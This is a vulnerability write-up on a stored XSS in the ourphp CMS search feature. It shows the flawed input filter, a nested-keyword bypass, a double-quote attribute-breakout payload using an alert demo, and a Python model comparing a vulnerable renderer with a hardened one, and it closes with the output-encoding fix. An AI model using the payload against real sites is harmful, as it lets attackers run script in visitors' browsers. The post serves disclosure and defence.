ourphp, all versions: conditional stored XSS

Summer break was too quiet, so I went and found a CMS online for us to look at. The impact honestly is not large (a front-end getshell in any of the larger CMSes is simply beyond what I can dig up), so please treat this as a small dessert.

The problem is in /function/ourphp_search.class.php

Without further ado, here is the key code

$content = dowith_sql($_REQUEST['content']);
$sid = dowith_sql($_REQUEST['sid']);
$lang = dowith_sql($_REQUEST['lang']);
$inputno = $ourphp_adminfont['inputno'];
$strlength = $ourphp_adminfont['strlength'];
$type = dowith_sql($_REQUEST['type']);

Here every request parameter is passed through a function called dowith_sql before it is used.

So let's follow it in and take a look.

function dowith_sql($ourphpstr){
// SQL escaping only: a double quote becomes \" here, nothing more.
$ourphpstr = addslashes($ourphpstr);
// One case-insensitive pass per keyword, never re-scanned.
$ourphpstr = str_ireplace(" and ","",$ourphpstr);
$ourphpstr = str_ireplace(" or ","",$ourphpstr);
$ourphpstr = str_ireplace("execute","",$ourphpstr);
$ourphpstr = str_ireplace("update","",$ourphpstr);
$ourphpstr = str_ireplace("count","",$ourphpstr);
$ourphpstr = str_ireplace("chr","",$ourphpstr);
$ourphpstr = str_ireplace("truncate","",$ourphpstr);
$ourphpstr = str_ireplace("char","",$ourphpstr);
$ourphpstr = str_ireplace("declare","",$ourphpstr);
$ourphpstr = str_ireplace("select","",$ourphpstr);
$ourphpstr = str_ireplace("create","",$ourphpstr);
$ourphpstr = str_ireplace("delete","",$ourphpstr);
$ourphpstr = str_ireplace("insert","",$ourphpstr);
$ourphpstr = str_ireplace("limit","",$ourphpstr);
$ourphpstr = str_ireplace("extractvalue","",$ourphpstr);
$ourphpstr = str_ireplace("concat","",$ourphpstr);
$ourphpstr = str_ireplace("&&","",$ourphpstr);
$ourphpstr = str_ireplace("||","",$ourphpstr);
$ourphpstr = str_ireplace("<script","",$ourphpstr);
$ourphpstr = str_ireplace("<iframe","",$ourphpstr);
$ourphpstr = str_ireplace("<embed","",$ourphpstr);
$ourphpstr = str_ireplace("*","",$ourphpstr);
$ourphpstr = str_ireplace("#","",$ourphpstr);
// The single quote is stripped; the double quote is not touched at all.
$ourphpstr = str_ireplace("'","",$ourphpstr);
// Partial HTML encoding. Note the order: & is encoded after < and >,
// so the entities just produced are double-encoded (< ends up as &amp;lt;).
$ourphpstr = str_ireplace("<","&lt;",$ourphpstr);
$ourphpstr = str_ireplace(">","&gt;",$ourphpstr);
$ourphpstr = str_ireplace("&","&amp;",$ourphpstr);
return $ourphpstr;
}

Anyone who has played CTF will see the problem at a glance. Each keyword such as select is replaced with an empty string, but only in a single pass that is never re-scanned, so nesting the keyword inside itself survives the filter:

seselectlect

comes out the other side as select.

The ' is stripped as well though, which makes injection awkward, but injection is not today's topic.
We can see that < and > are filtered too, so at first glance there is no way in for our XSS. Before giving up, let's look at the output point.

Type test into the search box and inspect the element.

Our payload shows up inside an attribute of an a tag, so the < and > filter is beside the point: all we need to break out of the attribute is a double quote, and the filter only strips the single quote. (addslashes does put a backslash in front of it, but that is SQL escaping and is consumed when the term is written to the database; when it is read back for the hot-search list the quote is bare again, which is also what makes this stored rather than reflected.)

So we enter

" onclick="alert(1)" "

and the resulting anchor in the page looks like this:

<a href="search.php?cn-&content=" onclick="alert(1)" "&lang=cn&sid=product">test</a>

The first " closes the href value, and what follows is parsed as a new onclick attribute on the link.

There is a precondition (submit it repeatedly until it reaches the hot searches), but precisely because it sits in the hot searches, ordinary users are quite likely to click it, so the impact is still real.
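To make the two weak spots concrete, the single-pass keyword stripping and the missing double-quote encoding at the output point, here is a Python model of the whole path. It is an added example, not ourphp's code: dowith_sql is ported from the PHP above, the database round-trip that consumes the addslashes backslashes is an assumption modelled with a stripslashes equivalent, and the link shape, link text and the hardened renderer are mine.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import quote_plus

# Blacklist tokens in the same order as the PHP original.
BLACKLIST = [
    " and ", " or ", "execute", "update", "count", "chr", "truncate", "char",
    "declare", "select", "create", "delete", "insert", "limit", "extractvalue",
    "concat", "&&", "||", "<script", "<iframe", "<embed", "*", "#", "'",
]


def addslashes(s: str) -> str:
    """Port of PHP addslashes() for backslash and both quote characters
    (PHP also rewrites NUL; irrelevant for this payload)."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def dowith_sql(s: str) -> str:
    """Python port of dowith_sql(): SQL-style escaping, one case-insensitive
    removal pass per blacklisted token, then a partial HTML encode."""
    s = addslashes(s)
    for token in BLACKLIST:
        # str_ireplace is a single left-to-right pass that is never re-scanned,
        # so "seselectlect" collapses to "select".
        s = re.sub(re.escape(token), "", s, flags=re.IGNORECASE)
    # Same order as the original: '&' is encoded last, so the entities just
    # produced are double-encoded ('<' ends up as '&amp;lt;').
    # What is NOT here: the double quote survives untouched.
    return s.replace("<", "&lt;").replace(">", "&gt;").replace("&", "&amp;")


def stripslashes(s: str) -> str:
    """Port of PHP stripslashes(): drop one backslash before any character."""
    return re.sub(r"\\(.)", r"\1", s, flags=re.DOTALL)


def stored_term(user_input: str) -> str:
    """Assumption: the filtered value is written to MySQL as a quoted literal,
    so the backslashes addslashes() added are consumed on insert and the stored
    hot-search term comes back with bare quotes. Modelled with stripslashes."""
    return stripslashes(dowith_sql(user_input))


def render_hot_search_vulnerable(term: str) -> str:
    """Output point as the post shows it: the stored term is dropped straight
    into the href attribute (URL shape and link text are assumptions)."""
    return f'<a href="search.php?cn-&content={term}&lang=cn&sid=product">{term}</a>'


def render_hot_search_fixed(term: str) -> str:
    """Hardened: URL-encode the query value, then HTML-encode the attribute and
    the text, quotes included (htmlspecialchars with ENT_QUOTES in PHP)."""
    href = f"search.php?cn-&content={quote_plus(term)}&lang=cn&sid=product"
    return f'<a href="{html.escape(href, quote=True)}">{html.escape(term, quote=True)}</a>'


class _AnchorAttrs(HTMLParser):
    """Collects attribute names of <a> tags: what a tolerant HTML parser
    (and therefore a browser) makes of the markup."""

    def __init__(self) -> None:
        super().__init__()
        self.names: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.names.extend(name for name, _ in attrs)


def anchor_attribute_names(markup: str) -> list[str]:
    p = _AnchorAttrs()
    p.feed(markup)
    p.close()
    return p.names


PAYLOAD = '" onclick="alert(1)" "'  # the post's payload


if __name__ == "__main__":
    print(dowith_sql("seselectlect"))
    term = stored_term(PAYLOAD)
    for render in (render_hot_search_vulnerable, render_hot_search_fixed):
        markup = render(term)
        print(markup)
        print("  attributes seen by the parser:", anchor_attribute_names(markup))
```

The fix that matters is the one in the last renderer: at the output point, pass the stored term through htmlspecialchars($term, ENT_QUOTES, 'UTF-8') (after urlencode() for the query value) so the double quote becomes &quot; and can no longer close the attribute. A request-time blacklist like dowith_sql is not a substitute for encoding at the point of output, in the context where the data lands.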